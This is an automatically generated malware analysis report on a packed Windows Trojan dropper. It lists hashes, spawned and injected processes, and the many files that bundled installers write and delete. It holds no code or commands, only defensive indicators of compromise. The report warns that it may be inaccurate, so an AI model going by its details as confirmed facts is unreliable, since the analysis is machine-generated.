Trojan.NSIS.StartPage_4ef0a3733f
Trojan.NSIS.StartPage.FD, Trojan.Win32.IEDummy.FD, mzpefinder_pcap_file.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 4ef0a3733fc5a67cf2f092543e147b35
SHA1: faaf987b561e20472df41e1212eefa0d7b4ee66e
SHA256: 6c1fccf0dabb305645fbd5c94fbb20edeb24fe9ba33a74ed0616db0213e91019
SSDeep: 196608:/5nXAPYOn5M6jOlYBjuc8xJDKtBP0vucdOsI YVQMqmQUxPPcULmswJ3W7ixKk9S:xnAYSMw 0unXnvv0TsuPPTwJG7/koNWO
Size: 13738518 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2010-04-10 15:19:23
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
9158chat2_ktv088_63.exe:2116
sr.exe:244
9158IE.exe:3116
xianfengkunbang.exe:1324
BaiduP2PService.exe:252
BaiduP2PService.exe:472
RsMgrSvc.exe:1936
regsvr32.exe:2380
regsvr32.exe:2448
regsvr32.exe:2328
regsvr32.exe:2480
9158.exe:3012
popwndexe.exe:760
xianfengupdate.exe:660
%original file name%.exe:1736
The Trojan injects its code into the following process(es):
MM-liao8863.exe:2808
xianfeng.exe:272
QQPCDownload71960.exe:2776
install1393485.exe:1148
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process 9158chat2_ktv088_63.exe:2116 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓÆµ\öÃâ€ÃƒËœ 9158¶àÈËÊÓÆµ.lnk (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading2.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading1.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step1.bmp (22192 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓÆµ\9158¶àÈËÊÓÆµ.lnk (707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\close.bmp (824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step2.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step3.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\return.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\finish.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Desktop\9158¶àÈËÊÓÆµ.lnk (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc11.tmp (1012028 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\custom.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox1.bmp (3 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\finish.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\custom.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\close.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step3.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\return.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\SkinBtn.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox1.bmp (0 bytes)
The process sr.exe:244 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\install.txt (344 bytes)
The process xianfengkunbang.exe:1324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\nsTools.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr8.tmp (48917 bytes)
%Program Files%\tools\BaiduP2PService.exe (17848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\System.dll (11 bytes)
%Program Files%\tools\P2PStatReport.dll (12536 bytes)
%Program Files%\tools\P2SBase.dll (18424 bytes)
%Program Files%\tools\P2PBase.dll (17848 bytes)
%Program Files%\tools\sr.exe (5520 bytes)
The Trojan deletes the following file(s):
%Program Files%\tools\isWrite (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\nsTools.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\System.dll (0 bytes)
The process MM-liao8863.exe:2808 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M9YNOH2J\xui[1].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OZ0N258D\CA4PMRS9.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M9YNOH2J\CAURKDUJ.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OZ0N258D\icons[1].gif (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\Opendownloadernewxml[1].htm (899 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6N8PMZAJ\Downloaderconfig[1].htm (948 bytes)
%Program Files%\9158ktv\DownLoad\9158chat2_ktv088_63.exe.tmp (121120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\CA8HUBK5.htm (764 bytes)
C:\temp.icon (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6N8PMZAJ\main[1].ico (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\1[1].swf (48341 bytes)
The process BaiduP2PService.exe:472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (148 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabA.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabE.tmp (50 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabC.tmp (54 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdtp (158659 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdre (1040 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarD.tmp (2712 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdtp (117549 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\ch_dl_url.exe.bdre (2840 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\ch_dl_url.exe.bdtp (412553 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarB.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdre (892 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (50 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\bdsecushr.dat (3628 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdtp (568599 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\tasks.dat (2420 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdre (2124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarF.tmp (2712 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\TarD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarB.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdre (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdre (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabA.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdre (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\tasks.ini (0 bytes)
The process xianfeng.exe:272 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\ioSpecial.ini (1796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\modern-wizard.bmp (26 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp (0 bytes)
The process RsMgrSvc.exe:1936 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Rising\RSD\RsMgrSvc.exe.log (367 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.dat (708 bytes)
The process QQPCDownload71960.exe:2776 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDetector.dll (5257 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\QQPCMgr_Setup.exe (454597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\setup.xml (580 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.dll (9775 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\qmdr\dr.dll (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.kui (1661 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (0 bytes)
The process install1393485.exe:1148 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ui\snin.htm (527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsmon.db1 (43 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.exe (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\RsMgrsvc.ini (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.rstray (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\moncom08.dll (443 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\moncomm.dll (1222 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\label.dat (384 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\datastorage.db (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CfgDll.dll (701 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\comx3.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\rscfg.dll (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.dll (1353 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\lics936.txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscommx2.dll (479 bytes)
%Program Files%\Rising\RSD\XMLS\RSSetup.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsMgrSvc.exe (1855 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard.sys (1707 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\RSCFG.xml (996 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD932\Jpn.lag (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\os.xml (685 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\Setup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3w.dll (1848 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\RAVMON.xml (574 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\_rav.xml (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\comx3.dll (709 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\monbasedui.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\RAVCONFIG.xml (518 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RstoreDll.dll (953 bytes)
%Program Files%\Rising\RSD\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\selfmon.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\url.ini (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\atl90.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.mond (485 bytes)
%Program Files%\RsTest.ini (14 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.exe (86 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravconfig.xml (518 bytes)
%Program Files%\Rising\RSD\updater.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudnotifier.dll (2752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\12345678.000 (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.ATL.manifest (466 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsmon.dat (45 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\dfw.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils.sys (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CompsVer.inf (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogDc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Setup.exe (8063 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsndisp.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\ravbase.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.mond (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dll (3859 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogAc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudv3.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RavSetup.dll (7433 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\RAVXP.xml (404 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bacore.dll (2321 bytes)
%Program Files%\Rising\RSD\setup.dat (601 bytes)
%Program Files%\Rising\RSD\rslang.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\ravlog.xml (545 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rslang.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsndisp.sys (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\mscrt9.xml (961 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rscom.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\comx3.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\rsmondef.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\CfgDll.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\defmon.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\ravxp.exe (601 bytes)
%Program Files%\Rising\RSD\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt09.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dat (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\mergexml.dll (117 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\Cloudv3.dll (4727 bytes)
%Program Files%\Rising\RSD\rsmginfo.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\rslog.dll (25 bytes)
%Program Files%\Rising\RSD\comx3.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogDc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\comx3.dll (693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.CRT.manifest (496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rslang.dll (1655 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\ravmon.xml (574 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\adefmon.mond (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\localopt.dll (2190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mond.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\url.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.xml (404 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsdll.dll.dat (601 bytes)
%Program Files%\Rising\RSD\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg (48 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.rstray (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Custom.xml (775 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSSETUP.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rssqlite.dll (4311 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\monrule.dll (211 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mondcoms.xml (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\lics936.txt (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\atl90.dll (1254 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon.sys (2740 bytes)
%System%\drivers\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\localopt.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rscurl.dll (3126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudnet.dll (2054 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsBackup.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mond (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Rising.ico (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscomm.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAVBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsutils.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rstask.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSSetup.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\c[1].aspx (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\procenv.dll (29 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\CLOUDV3.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsStub.exe (1762 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\license.xml (347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\syslay.dll (316 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt08.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\updater.exe (7115 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\dataups.dat (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Rav.7z (22865 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.CRT.manifest (496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\ravmaindui.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcp90.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcr90.dll (4185 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudwork.dll (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\datastorage.db (19 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dat (22 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\traywnd.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\setup.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\Cloudv3.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils.sys (601 bytes)
%Program Files%\Rising\RSD\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\update.xml (164 bytes)
%Program Files%\Rising\RSD\popwndexe.exe (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RsBaseNetWrapper.dll (48 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\RSMONDEF.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsTray.ico (601 bytes)
%Program Files%\Rising\RSD\Data\RAV\RAV.ini (50 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\update.xml (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\update.xml (164 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccomm.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\RSDK.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\RAVLOG.xml (545 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\moncom08.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\_RAV.xml (368 bytes)
%Program Files%\Rising\RSD\RsAppMgr.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\pngdll.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD1252\Eng.lag (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmginfo.dll (1115 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\syslay.dll (26 bytes)
%Program Files%\Rising\RSD\RsStub.exe (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAV.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rspalvd.dll (1411 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RavSetup.dll (12014 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rscombas.dll (2035 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bacore.dll (5060 bytes)
%Program Files%\Rising\RSD\RSD1252\Eng.lag (52 bytes)
